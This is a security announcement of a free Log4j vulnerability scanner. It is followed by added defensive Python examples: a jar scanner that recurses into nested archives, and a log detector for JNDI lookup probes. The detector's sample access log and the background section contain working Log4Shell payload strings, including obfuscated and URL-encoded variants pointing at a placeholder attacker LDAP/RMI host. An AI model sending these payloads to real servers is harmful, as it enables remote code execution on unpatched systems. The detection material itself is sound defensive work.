Following the critical-severity vulnerability CVE-2021-44228 (CVSS 10.0) in the Apache Log4j 2 library, announced last Friday, our partner Whitesource Software has launched Whitesource Log4j Detect, a free command-line interface (CLI) tool that helps organizations quickly detect and remediate the Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046.
This free developer tool, hosted on GitHub and available now, scans a project for vulnerable Log4j versions and reports the exact path to each one, whether it is a direct or a transitive (indirect) dependency, together with the fixed version to upgrade to. It is a standalone utility: download the build for your platform, open a terminal, and run the scan command against the root folder of the project.
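To make the detection idea concrete, here is an added example written for this page; it is not the Whitesource tool's code and does not resolve Maven or Gradle dependency graphs the way that tool does. It walks a directory, opens every jar/war/ear, recurses into jars nested inside fat jars (where a shaded copy of log4j-core is easy to miss), identifies log4j-core by the presence of the `JndiLookup` class, reads the version from the manifest (falling back to the file name), and maps it to a verdict. The fix levels used are facts: 2.15.0 closed CVE-2021-44228, 2.16.0 closed CVE-2021-45046, and 2.12.2 carries both fixes on the Java 7 branch. The jars in `demo()` are constructed stand-ins (a manifest plus an empty class entry), not real artifacts.

```python
import io
import os
import re
import tempfile
import zipfile

# Added example, not the Whitesource tool. Fix levels (facts): 2.15.0 closed
# CVE-2021-44228, 2.16.0 closed CVE-2021-45046; 2.12.2 carries both fixes for
# the Java 7 branch. Everything from 2.0-beta9 up to 2.14.1 is affected.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_44228, FIXED_45046, FIXED_JAVA7 = (2, 15, 0), (2, 16, 0), (2, 12, 2)
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(v):
    """'2.14.1' -> (2, 14, 1); a pre-release such as '2.0-beta9' -> (2, 0, 0)."""
    nums = re.findall(r"\d+", v.split("-")[0])[:3]
    return tuple(int(n) for n in nums + ["0"] * (3 - len(nums)))


def classify(version):
    """Map a log4j-core version string to a remediation verdict."""
    if version is None:
        return "log4j-core present but version unknown: inspect manually"
    v = parse_version(version)
    if v[:2] == (2, 12) and v >= FIXED_JAVA7:
        return "fixed (2.12.2 Java 7 branch)"
    if v < FIXED_44228:
        return "VULNERABLE to CVE-2021-44228 and CVE-2021-45046: upgrade to 2.16.0+"
    if v < FIXED_45046:
        return "VULNERABLE to CVE-2021-45046: upgrade to 2.16.0+"
    return "fixed"


def manifest_version(zf):
    """Read Implementation-Version from META-INF/MANIFEST.MF, if present."""
    try:
        text = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    m = re.search(r"^Implementation-Version:\s*(\S+)", text, re.M)
    return m.group(1) if m else None


def scan_archive(data, label):
    """Inspect one archive held in memory and recurse into jars nested inside it
    (fat/uber jars, WAR WEB-INF/lib) so shaded copies are not missed.
    A jar whose JndiLookup.class was deleted as a mitigation yields no finding.
    Returns [(label, version, verdict), ...]."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = zf.namelist()
        if JNDI_LOOKUP_CLASS in names:  # the class that performs the lookup
            m = re.search(r"log4j-core-(\d[\w.\-]*)\.jar", label)
            ver = manifest_version(zf) or (m.group(1) if m else None)
            findings.append((label, ver, classify(ver)))
        for n in names:
            if n.endswith(ARCHIVE_EXT[:3]):
                findings.extend(scan_archive(zf.read(n), f"{label}!/{n}"))
    return findings


def scan_tree(root):
    """Walk a project directory and scan every archive found, sorted by path."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    findings.extend(scan_archive(fh.read(), path))
    return sorted(findings)


def fake_log4j_core(version):
    """Constructed stand-in for a log4j-core jar: manifest + the lookup class name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def demo():
    """Build a constructed project tree and scan it: a direct 2.14.1 dependency
    in lib/ and a Spring-Boot-style fat jar that nests a fixed 2.16.0 copy."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "lib"))
        with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as f:
            f.write(fake_log4j_core("2.14.1"))
        fat = io.BytesIO()
        with zipfile.ZipFile(fat, "w") as zf:
            zf.writestr("BOOT-INF/lib/log4j-core-2.16.0.jar", fake_log4j_core("2.16.0"))
        with open(os.path.join(root, "app.jar"), "wb") as f:
            f.write(fat.getvalue())
        # strip the temp-dir prefix so results are stable across runs
        return [(p[len(root) + 1:], v, s) for p, v, s in scan_tree(root)]


if __name__ == "__main__":
    for path, version, verdict in demo():
        print(f"{path}: log4j-core {version} -> {verdict}")
```

Run it with `python3 scan_log4j.py` (assumed file name). The nested-jar recursion is the part worth keeping in mind when reading any scanner's output: a clean `lib/` directory says nothing about what a build plugin has shaded into the deployable artifact, so scan the artifact you actually ship, not just the source tree.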
Some background on the vulnerability. It poses a major risk to applications because it allows unauthenticated remote code execution through Log4j's JNDI lookup feature. In Log4j 2 versions up to and including 2.14.1 (2.0-beta9 through 2.14.1), an attacker who can control log messages or log message parameters can place a lookup such as `${jndi:ldap://<attacker host>/x}` in logged data; when message lookup substitution is enabled (the default in those versions), Log4j resolves it against the attacker's LDAP server and executes the code it returns. CVE-2021-45046 was assigned after the initial fix in 2.15.0 proved incomplete in certain non-default configurations; Log4j 2.16.0 removes message lookups and disables JNDI by default, which is why it is the version to upgrade to.
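Alongside scanning dependencies, responders usually want to know whether anyone has already tried the lookup string against their systems. The following is an added example, not part of the announcement or of the Whitesource tool: a small detector that runs over web-server access log lines and flags JNDI lookup strings, after undoing the obfuscations commonly used against naive filters (nested `${lower:..}`/`${upper:..}` lookups, `${x:-y}` default-value lookups, and URL encoding). It goes slightly beyond the text by matching the other JNDI URL schemes an attacker can use (`rmi`, `dns`, and so on), not only `ldap`. The log lines are constructed for the example and use TEST-NET addresses.

```python
import re
from urllib.parse import unquote

# Added example, not the Whitesource tool. Matches the lookup syntax that
# triggers the JNDI lookup in affected Log4j 2 versions, after collapsing
# the disguises attackers wrap around it.
NESTED_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)  # ${lower:J} -> J
DEFAULT_VAL = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")                # ${env:X:-j} -> j
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)

# Constructed sample access log (Apache combined format); not real traffic.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.50:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:19 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}dap://203.0.113.50:1389/b}"',
    '203.0.113.10 - - [10/Dec/2021:14:02:23 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.50%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.11 - - [10/Dec/2021:14:02:27 +0000] "GET /?price=${total:-0} HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
]


def normalize(text):
    """URL-decode, then collapse nested lookups until the text stops changing.
    Case is irrelevant to the matcher, so ${lower:X} simply becomes X."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = NESTED_CASE.sub(lambda m: m.group(1), text)
        text = DEFAULT_VAL.sub(lambda m: m.group(1), text)
    return text


def is_jndi_probe(line):
    """True if the line carries a JNDI lookup string in any recognised disguise."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def find_probes(lines):
    """Return (line_number, jndi_scheme) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            hits.append((number, m.group(1).lower()))
    return hits


if __name__ == "__main__":
    for number, scheme in find_probes(SAMPLE_ACCESS_LOG):
        print(f"line {number}: JNDI lookup via {scheme}")
```

Line 5 shows why the normalisation has to be applied before matching rather than used as a signature on its own: `${total:-0}` is a legitimate-looking default-value lookup and is correctly not flagged. Treat this as a triage aid for hunting attempts in logs; further obfuscations exist, and the remediation remains the upgrade the scanner points you to.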